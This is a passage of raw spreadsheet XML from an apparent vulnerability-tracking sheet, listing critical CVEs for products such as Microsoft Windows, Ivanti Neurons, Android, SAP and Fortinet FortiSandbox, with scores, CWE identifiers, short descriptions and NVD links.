/><c r="R13" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S13" s="5" t="inlineStr"><is><t>A improper access control vulnerability in Fortinet FortiSandbox 5.0.0 through 5.0.5, FortiSandbox 4.4.0 through 4.4.8, FortiSandbox Cloud 5.0.4 through 5.0.5, FortiSandbox PaaS 5.0.4 through 5.0.5 may allow attacker to access sensitive information via crafted HTTP requests.</t></is></c><c r="T13" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-26084</t></is></c></row><row r="14"><c r="A14" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B14" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C14" s="5" t="inlineStr"><is><t>CVE-2026-48273</t></is></c><c r="D14" s="5" t="n"><v>9.9</v></c><c r="E14" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F14" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G14" s="5" t="inlineStr" /><c r="H14" s="5" t="n"><v>0.019</v></c><c r="I14" s="5" t="inlineStr" /><c r="J14" s="5" t="inlineStr" /><c r="K14" s="5" t="inlineStr"><is><t>adobe:coldfusion</t></is></c><c r="L14" s="5" t="inlineStr" /><c r="M14" s="5" t="inlineStr" /><c r="N14" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O14" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P14" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q14" s="5" t="inlineStr" /><c r="R14" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="S14" s="5" t="inlineStr"><is><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is></c><c r="T14" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-48273</t></is></c></row><row r="15"><c r="A15" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B15" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C15" s="5" t="inlineStr"><is><t>CVE-2026-78234</t></is></c><c r="D15" s="5" t="n"><v>9.9</v></c><c r="E15" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F15" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G15" s="5" t="inlineStr" /><c r="H15" s="5" t="n"><v>0.002</v></c><c r="I15" s="5" t="inlineStr" /><c r="J15" s="5" t="inlineStr" /><c r="K15" s="5" t="inlineStr" /><c r="L15" s="5" t="inlineStr" /><c r="M15" s="5" t="inlineStr" /><c r="N15" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O15" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P15" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q15" s="5" t="inlineStr" /><c r="R15" s="5" t="inlineStr"><is><t>CWE-295</t></is></c><c r="S15" s="5" t="inlineStr"><is><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is></c><c r="T15" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78234</t></is></c></row><row r="16"><c r="A16" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B16" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C16" s="5" t="inlineStr"><is><t>CVE-2026-86464</t></is></c><c r="D16" s="5" t="n"><v>9.9</v></c><c r="E16" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F16" s="5" t="inlineStr"><is><t>emo@eclipse.org</t></is></c><c r="G16" s="5" t="inlineStr" /><c r="H16" s="5" t="n"><v>0.004</v></c><c r="I16" s="5" t="inlineStr" /><c r="J16" s="5" t="inlineStr"><is><t>kubernetes, docker, postgresql, keycloak</t></is></c><c r="K16" s="5" t="inlineStr" /><c r="L16" s="5" t="inlineStr" /><c r="M16" s="5" t="inlineStr" /><c r="N16" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O16" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P16" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q16" s="5" t="inlineStr" /><c r="R16" s="5" t="inlineStr"><is><t>CWE-1188, CWE-1392, CWE-200, CWE-306, CWE-798</t></is></c><c r="S16" s="5" t="inlineStr"><is><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is></c><c r="T16" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86464</t></is></c></row><row r="17"><c r="A17" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B17" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C17" s="5" t="inlineStr"><is><t>CVE-2026-12744</t></is></c><c r="D17" s="5" t="n"><v>9.800000000000001</v></c><c r="E17" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F17" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G17" s="5" t="inlineStr" /><c r="H17" s="5" t="n"><v>0.022</v></c><c r="I17" s="5" t="inlineStr" /><c r="J17" s="5" t="inlineStr" /><c r="K17" s="5" t="inlineStr" /><c r="L17" s="5" t="inlineStr" /><c r="M17" s="5" t="inlineStr" /><c r="N17" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O17" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P17" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q17" s="5" t="inlineStr" /><c r="R17" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S17" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T17" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12744</t></is></c></row><row r="18"><c r="A18" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B18" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C18" s="5" t="inlineStr"><is><t>CVE-2026-12745</t></is></c><c r="D18" s="5" t="n"><v>9.800000000000001</v></c><c r="E18" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F18" s="5" t="inlineStr"><is><t>3c1d8aa1-5a33-4ea4-8992-aadd6440af75</t></is></c><c r="G18" s="5" t="inlineStr" /><c r="H18" s="5" t="n"><v>0.021</v></c><c r="I18" s="5" t="inlineStr" /><c r="J18" s="5" t="inlineStr" /><c r="K18" s="5" t="inlineStr" /><c r="L18" s="5" t="inlineStr" /><c r="M18" s="5" t="inlineStr" /><c r="N18" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O18" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P18" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q18" s="5" t="inlineStr" /><c r="R18" s="5" t="inlineStr"><is><t>CWE-502</t></is></c><c r="S18" s="5" t="inlineStr"><is><t>A Deserialization of Untrusted Data vulnerability in Ivanti Neurons for ITSM before 2026.2 allows a remote unauthenticated attacker to execute arbitrary code on the server.</t></is></c><c r="T18" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12745</t></is></c></row><row r="19"><c r="A19" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B19" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C19" s="5" t="inlineStr"><is><t>CVE-2026-28606</t></is></c><c r="D19" s="5" t="n"><v>9.800000000000001</v></c><c r="E19" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F19" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G19" s="5" t="inlineStr" /><c r="H19" s="5" t="n"><v>0.003</v></c><c r="I19" s="5" t="inlineStr" /><c r="J19" s="5" t="inlineStr" /><c r="K19" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L19" s="5" t="inlineStr" /><c r="M19" s="5" t="inlineStr" /><c r="N19" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O19" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P19" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q19" s="5" t="inlineStr" /><c r="R19" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S19" s="5" t="inlineStr"><is><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is></c><c r="T19" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28606</t></is></c></row><row r="20"><c r="A20" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B20" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C20" s="5" t="inlineStr"><is><t>CVE-2026-49921</t></is></c><c r="D20" s="5" t="n"><v>9.800000000000001</v></c><c r="E20" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F20" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G20" s="5" t="inlineStr" /><c r="H20" s="5" t="n"><v>0.003</v></c><c r="I20" s="5" t="inlineStr" /><c r="J20" s="5" t="inlineStr" /><c r="K20" s="5" t="inlineStr" /><c r="L20" s="5" t="inlineStr" /><c r="M20" s="5" t="inlineStr" /><c r="N20" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O20" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P20" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q20" s="5" t="inlineStr" /><c r="R20" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S20" s="5" t="inlineStr"><is><t>In multiple locations, there is a possible memory safety issue due to a heap buffer overflow. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T20" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-49921</t></is></c></row><row r="21"><c r="A21" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B21" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C21" s="5" t="inlineStr"><is><t>CVE-2026-58240</t></is></c><c r="D21" s="5" t="n"><v>9.800000000000001</v></c><c r="E21" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F21" s="5" t="inlineStr"><is><t>cna@sap.com</t></is></c><c r="G21" s="5" t="inlineStr" /><c r="H21" s="5" t="n"><v>0.003</v></c><c r="I21" s="5" t="inlineStr" /><c r="J21" s="5" t="inlineStr"><is><t>sap</t></is></c><c r="K21" s="5" t="inlineStr" /><c r="L21" s="5" t="inlineStr" /><c r="M21" s="5" t="inlineStr" /><c r="N21" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O21" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P21" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q21" s="5" t="inlineStr" /><c r="R21" s="5" t="inlineStr"><is><t>CWE-308</t></is></c><c r="S21" s="5" t="inlineStr"><is><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is></c><c r="T21" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58240</t></is></c></row><row r="22"><c r="A22" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B22" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C22" s="5" t="inlineStr"><is><t>CVE-2026-58822</t></is></c><c r="D22" s="5" t="n"><v>9.800000000000001</v></c><c r="E22" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F22" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G22" s="5" t="inlineStr" /><c r="H22" s="5" t="n"><v>0.003</v></c><c r="I22" s="5" t="inlineStr" /><c r="J22" s="5" t="inlineStr" /><c r="K22" s="5" t="inlineStr" /><c r="L22" s="5" t="inlineStr" /><c r="M22" s="5" t="inlineStr" /><c r="N22" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O22" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P22" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q22" s="5" t="inlineStr" /><c r="R22" s="5" t="inlineStr"><is><t>CWE-704</t></is></c><c r="S22" s="5" t="inlineStr"><is><t>In multiple functions of ftsmooth.c, there is a possible memory safety issue due to improper casting. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation.</t></is></c><c r="T22" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-58822</t></is></c></row><row r="23"><c r="A23" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B23" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C23" s="5" t="inlineStr"><is><t>CVE-2026-61516</t></is></c><c r="D23" s="5" t="n"><v>9.800000000000001</v></c><c r="E23" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F23" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G23" s="5" t="inlineStr" /><c r="H23" s="5" t="n"><v>0.004</v></c><c r="I23" s="5" t="inlineStr" /><c r="J23" s="5" t="inlineStr" /><c r="K23" s="5" t="inlineStr" /><c r="L23" s="5" t="inlineStr" /><c r="M23" s="5" t="inlineStr" /><c r="N23" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O23" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P23" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q23" s="5" t="inlineStr" /><c r="R23" s="5" t="inlineStr"><is><t>CWE-522</t></is></c><c r="S23" s="5" t="inlineStr"><is><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is></c><c r="T23" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-61516</t></is></c></row><row r="24"><c r="A24" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B24" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C24" s="5" t="inlineStr"><is><t>CVE-2026-66302</t></is></c><c r="D24" s="5" t="n"><v>9.800000000000001</v></c><c r="E24" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F24" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G24" s="5" t="inlineStr" /><c r="H24" s="5" t="n"><v>0.005</v></c><c r="I24" s="5" t="inlineStr" /><c r="J24" s="5" t="inlineStr" /><c r="K24" s="5" t="inlineStr"><is><t>microsoft:skype_for_business_server, microsoft:skype_for_business_server_subscription_edition</t></is></c><c r="L24" s="5" t="inlineStr" /><c r="M24" s="5" t="inlineStr" /><c r="N24" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O24" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P24" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q24" s="5" t="inlineStr" /><c r="R24" s="5" t="inlineStr"><is><t>CWE-73</t></is></c><c r="S24" s="5" t="inlineStr"><is><t>External control of file name or path in Skype for Business allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T24" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-66302</t></is></c></row><row r="25"><c r="A25" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B25" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C25" s="5" t="inlineStr"><is><t>CVE-2026-68839</t></is></c><c r="D25" s="5" t="n"><v>9.800000000000001</v></c><c r="E25" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F25" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G25" s="5" t="inlineStr" /><c r="H25" s="5" t="n"><v>0.008</v></c><c r="I25" s="5" t="inlineStr" /><c r="J25" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K2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 s="5" t="inlineStr" /><c r="M25" s="5" t="inlineStr" /><c r="N25" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O25" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P25" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q25" s="5" t="inlineStr" /><c r="R25" s="5" t="inlineStr"><is><t>CWE-122, CWE-20</t></is></c><c r="S25" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Mass Storage Class Driver allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T25" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68839</t></is></c></row><row r="26"><c r="A26" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B26" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C26" s="5" t="inlineStr"><is><t>CVE-2026-69276</t></is></c><c r="D26" s="5" t="n"><v>9.800000000000001</v></c><c r="E26" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F26" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G26" s="5" t="inlineStr" /><c r="H26" s="5" t="n"><v>0.008999999999999999</v></c><c r="I26" s="5" t="inlineStr" /><c r="J26" s="5" t="inlineStr" /><c r="K26" s="5" t="inlineStr" /><c r="L26" s="5" t="inlineStr" /><c r="M26" s="5" t="inlineStr" /><c r="N26" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O26" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P26" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q26" s="5" t="inlineStr" /><c r="R26" s="5" t="inlineStr"><is><t>CWE-122, CWE-191</t></is></c><c r="S26" s="5" t="inlineStr"><is><t>Integer underflow (wrap or wraparound) in Microsoft UxTheme Library (uxtheme.dll) allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T26" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69276</t></is></c></row><row r="27"><c r="A27" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B27" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C27" s="5" t="inlineStr"><is><t>CVE-2026-69408</t></is></c><c r="D27" s="5" t="n"><v>9.800000000000001</v></c><c r="E27" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F27" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G27" s="5" t="inlineStr" /><c r="H27" s="5" t="n"><v>0.01</v></c><c r="I27" s="5" t="inlineStr" /><c r="J27" s="5" t="inlineStr" /><c r="K27" s="5" t="inlineStr" /><c r="L27" s="5" t="inlineStr" /><c r="M27" s="5" t="inlineStr" /><c r="N27" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O27" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P27" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q27" s="5" t="inlineStr" /><c r="R27" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S27" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows Media Foundation allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T27" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69408</t></is></c></row><row r="28"><c r="A28" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B28" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C28" s="5" t="inlineStr"><is><t>CVE-2026-69431</t></is></c><c r="D28" s="5" t="n"><v>9.800000000000001</v></c><c r="E28" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F28" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G28" s="5" t="inlineStr" /><c r="H28" s="5" t="n"><v>0.008999999999999999</v></c><c r="I28" s="5" t="inlineStr" /><c r="J28" s="5" t="inlineStr" /><c r="K28" s="5" t="inlineStr" /><c r="L28" s="5" t="inlineStr" /><c r="M28" s="5" t="inlineStr" /><c r="N28" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O28" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P28" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q28" s="5" t="inlineStr" /><c r="R28" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S28" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T28" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69431</t></is></c></row><row r="29"><c r="A29" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B29" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C29" s="5" t="inlineStr"><is><t>CVE-2026-69463</t></is></c><c r="D29" s="5" t="n"><v>9.800000000000001</v></c><c r="E29" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F29" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G29" s="5" t="inlineStr" /><c r="H29" s="5" t="n"><v>0.008999999999999999</v></c><c r="I29" s="5" t="inlineStr" /><c r="J29" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K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9" s="5" t="inlineStr" /><c r="M29" s="5" t="inlineStr" /><c r="N29" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O29" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P29" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q29" s="5" t="inlineStr" /><c r="R29" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S29" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T29" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69463</t></is></c></row><row r="30"><c r="A30" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B30" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C30" s="5" t="inlineStr"><is><t>CVE-2026-69491</t></is></c><c r="D30" s="5" t="n"><v>9.800000000000001</v></c><c r="E30" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F30" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G30" s="5" t="inlineStr" /><c r="H30" s="5" t="n"><v>0.008999999999999999</v></c><c r="I30" s="5" t="inlineStr" /><c r="J30" s="5" t="inlineStr" /><c r="K30" s="5" t="inlineStr" /><c r="L30" s="5" t="inlineStr" /><c r="M30" s="5" t="inlineStr" /><c r="N30" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O30" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P30" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q30" s="5" t="inlineStr" /><c r="R30" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S30" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Microsoft DirectMusic allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T30" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69491</t></is></c></row><row r="31"><c r="A31" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B31" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C31" s="5" t="inlineStr"><is><t>CVE-2026-69493</t></is></c><c r="D31" s="5" t="n"><v>9.800000000000001</v></c><c r="E31" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F31" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G31" s="5" t="inlineStr" /><c r="H31" s="5" t="n"><v>0.01</v></c><c r="I31" s="5" t="inlineStr" /><c r="J31" s="5" t="inlineStr" /><c r="K31" s="5" t="inlineStr" /><c r="L31" s="5" t="inlineStr" /><c r="M31" s="5" t="inlineStr" /><c r="N31" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O31" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P31" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q31" s="5" t="inlineStr" /><c r="R31" s="5" t="inlineStr"><is><t>CWE-122, CWE-125</t></is></c><c r="S31" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Event Logging Service allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T31" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69493</t></is></c></row><row r="32"><c r="A32" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B32" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C32" s="5" t="inlineStr"><is><t>CVE-2026-69496</t></is></c><c r="D32" s="5" t="n"><v>9.800000000000001</v></c><c r="E32" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F32" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G32" s="5" t="inlineStr" /><c r="H32" s="5" t="n"><v>0.01</v></c><c r="I32" s="5" t="inlineStr" /><c r="J32" s="5" t="inlineStr" /><c r="K32" s="5" t="inlineStr" /><c r="L32" s="5" t="inlineStr" /><c r="M32" s="5" t="inlineStr" /><c r="N32" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O32" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P32" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q32" s="5" t="inlineStr" /><c r="R32" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S32" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Compressed Folder allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T32" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69496</t></is></c></row><row r="33"><c r="A33" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B33" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C33" s="5" t="inlineStr"><is><t>CVE-2026-69525</t></is></c><c r="D33" s="5" t="n"><v>9.800000000000001</v></c><c r="E33" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F33" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G33" s="5" t="inlineStr" /><c r="H33" s="5" t="n"><v>0.01</v></c><c r="I33" s="5" t="inlineStr" /><c r="J33" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K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3" s="5" t="inlineStr" /><c r="M33" s="5" t="inlineStr" /><c r="N33" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O33" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P33" s="5" t="inlineStr"><is><t>2026-09-14</t></is></c><c r="Q33" s="5" t="inlineStr" /><c r="R33" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S33" s="5" t="inlineStr"><is><t>Use after free in Windows Remote Desktop Services allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T33" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69525</t></is></c></row><row r="34"><c r="A34" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B34" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C34" s="5" t="inlineStr"><is><t>CVE-2026-69579</t></is></c><c r="D34" s="5" t="n"><v>9.800000000000001</v></c><c r="E34" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F34" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G34" s="5" t="inlineStr" /><c r="H34" s="5" t="n"><v>0.01</v></c><c r="I34" s="5" t="inlineStr" /><c r="J34" s="5" t="inlineStr" /><c r="K34" s="5" t="inlineStr" /><c r="L34" s="5" t="inlineStr" /><c r="M34" s="5" t="inlineStr" /><c r="N34" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O34" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P34" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q34" s="5" t="inlineStr" /><c r="R34" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S34" s="5" t="inlineStr"><is><t>Use after free in Windows Message Queuing allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T34" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69579</t></is></c></row><row r="35"><c r="A35" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B35" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C35" s="5" t="inlineStr"><is><t>CVE-2026-69586</t></is></c><c r="D35" s="5" t="n"><v>9.800000000000001</v></c><c r="E35" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F35" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G35" s="5" t="inlineStr" /><c r="H35" s="5" t="n"><v>0.01</v></c><c r="I35" s="5" t="inlineStr" /><c r="J35" s="5" t="inlineStr" /><c r="K35" s="5" t="inlineStr" /><c r="L35" s="5" t="inlineStr" /><c r="M35" s="5" t="inlineStr" /><c r="N35" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O35" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P35" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q35" s="5" t="inlineStr" /><c r="R35" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="S35" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Microsoft Windows PDF allows an unauthorized attacker to execute code over a network.</t></is></c><c r="T35" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69586</t></is></c></row><row r="36"><c r="A36" s="5" t="inlineStr"><is><t>P2 - High</t></is></c><c r="B36" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C36" s="5" t="inlineStr"><is><t>CVE-2026-69590</t></is></c><c r="D36" s="5" t="n"><v>9.800000000000001</v></c><c r="E36" s="5" t="inlineStr"><is><t>CRITICAL</t></is></c><c r="F36" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G36" s="5" t="inlineStr" /><c r="H36" s="5" t="n"><v>0.01</v></c><c r="I36" s="5" t="inlineStr" /><c r="J36" s="5" t="inlineStr" /><c r="K36" s="5" t="inlineStr" /><c r="L36" s="5" t="inlineStr" /><c r="M36" s="5" 